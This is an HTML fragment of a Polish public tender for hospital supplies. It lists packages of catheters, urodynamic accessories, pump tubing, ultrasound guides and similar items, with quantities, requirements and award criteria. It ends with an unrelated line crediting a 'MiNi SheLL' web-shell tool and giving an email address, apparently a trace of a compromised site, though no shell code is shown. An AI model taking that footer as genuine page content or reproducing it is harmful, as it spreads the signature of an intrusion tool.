<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5  Cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	 Asortyment	Ilość szt.	j.m.
1	Cewnik Tiemana CH 8 - CH 18 opakowanie papierowo - foliowe	300	szt.
2	Cewnik Tiemana CH 20- 24 opakowanie papierowo - foliowe	130	szt.
3	Cewnik Couvelare CH 20,22,24 opakowanie papierowo - foliowe	20	szt.
4	Cewnik Nelatona CH 8 - 24 opakowanie papierowo - foliowe	730	szt.
5	Cewnik Foleya 100% Silikon CH 20 przeźroczysty, zakończenie cylindryczne, zastawka dopasowana do strzykawek z zakończeniem Luer i Luer-lock, dł.40-42cm, z osobno zapakowaną sterylną zatyczką w komplecie, opakowanie papierowo - foliowe	20	szt.
6	Cewnik Foleya CH 6-10 z prowadnicą obustronnie pokryty elastomerem silikonu, 3-5ml, opakowanie papierowo - foliowe.	140	szt.
7	Cewnik Foleya CH 12-24 z prowadnicą obustronnie pokryty elastomerem silikonu,  z balonem 5-15ml opakowanie papierowo - foliowe	5 400	szt.
8	Cewnik Foleya CH 12-24  z prowadnicą obustronnie pokryty elastomerem silikonu, z balonem 30-45ml opakowanie papierowo - foliowe	1 000	szt.

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim zawierający opis przedmiotu zamówienia, w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  									
									
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6  Akcesoria do badań urodynamicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	 Asortyment	Ilość szt.	j.m.
1	Cewnik dwukanałowy do cystometrii i cystometrii mikcyjnej, bez linii monometrycznej, 6F	15	szt.
2	Cewnik dwukanałowy abdominalny z balonikiem bez lateksu, kaniula  9F  	10	szt.
3	Linia manometryczna 150 cm	20	szt.
4	Dren pompy wodnej	15	szt.
5	Jednorazowy przetwornik ciśnienia wodnego	3	szt.

Wymagania Zamawiającego					
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 					
					
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7  Zestawy drenów do pompy płuczącej PV-5201.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość opakowań	J.m.
1	Dreny  DUPP- część dzienna x 1 opakow. (10 sztuk)	10	op
2	Dreny  SUPP- część pacjenta x 1 opakow. (50 sztuk)	3	op
3	Dreny  SUTS- jednorazowe x 1 opakow. ( 10 sztuk)	5	op

Wymagania Zamawiającego:				
 1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ. 				
				
2. Poz. 1-3 muszą być kompatybilne z pompą płuczącą PV-5201.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8  Prowadnice jednorazowe do głowicy UST-9124 do USG Aloka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	 Asortyment	Ilość sztuk 	j.m.
1	Prowadnice jednorazowe z osłonami do głowicy UST-9124 do USG Aloka x 1szt.	48	szt.

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.   									
									
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9  Aplikator do preparatu Lidocain EGIS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	 Asortyment	Ilość sztuk 	j.m.
1	Aplikator do preparatu Lidocain-EGIS aerozol na skórę, roztwór 38g.	1500	szt.

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 Stabilizator do wkuć centralnych typu STATLOCK.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	 Asortyment	Ilość sztuk 	j.m.
1	Stabilizator do wkłuć centralnych typu STATLOCK lub równoważny. 	200	szt.

Wymagania Zamawiającego									
1. Do oferty należy dołączyć : katalog lub folder producenta w języku polskim, zawierający opis przedmiotu zamówienia w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.   									
									
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11 Osłona na zęby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość
1	Jednorazowa, silikonowa lub piankowa, podwójna osłona na zęby, pełniąca funkcję ochrony zębów w czasie zabiegów laryngologicznych	200

Wymagania Zamawiającego:								
 1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12  Igły do ostrzyknięć.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość szt.
1	Igła do ostrzyknięć jednorazowego użytku dł.narzędzia 2300mm,śr.igły 0,7mm,śr.drenu 2,3mm dł. igły 5mm 	60

Wymagania Zamawiającego							
 1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  							
							
							
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13 Ustnik do alkomatu z serii Alkohit X100.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość szt.
1	Ustnik do alkomatu z serii Alkohit X100.	500

Wymagania Zamawiającego							
 1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  							
							
							
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14 - Cewnik tlenowy do aparatu PORTI 8..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Asortyment	Ilość szt.
1	Cewnik do tlenu jednorazowy o mniejszym otworze  wejścia do aparatu PORTI 8 wykonującego badanie polisomnograficzne.	350

Wymagania Zamawiającego							
 1. Wykonawca dołączy do oferty materiały producenta: katalogi lub foldery w języku polskim zawierające opis przedmiotu zamówienia  w celu weryfikacji zgodności  oferowanego produktu z opisem przedmiotu zamówienia w SIWZ.  							
							
							
2. Opakowania jednostkowe wyrobów medycznych muszą zawierać widoczne oznakowanie CE, numer serii, datę ważności oraz znak jednorazowego użycia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin realizacji dostawy CITO - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com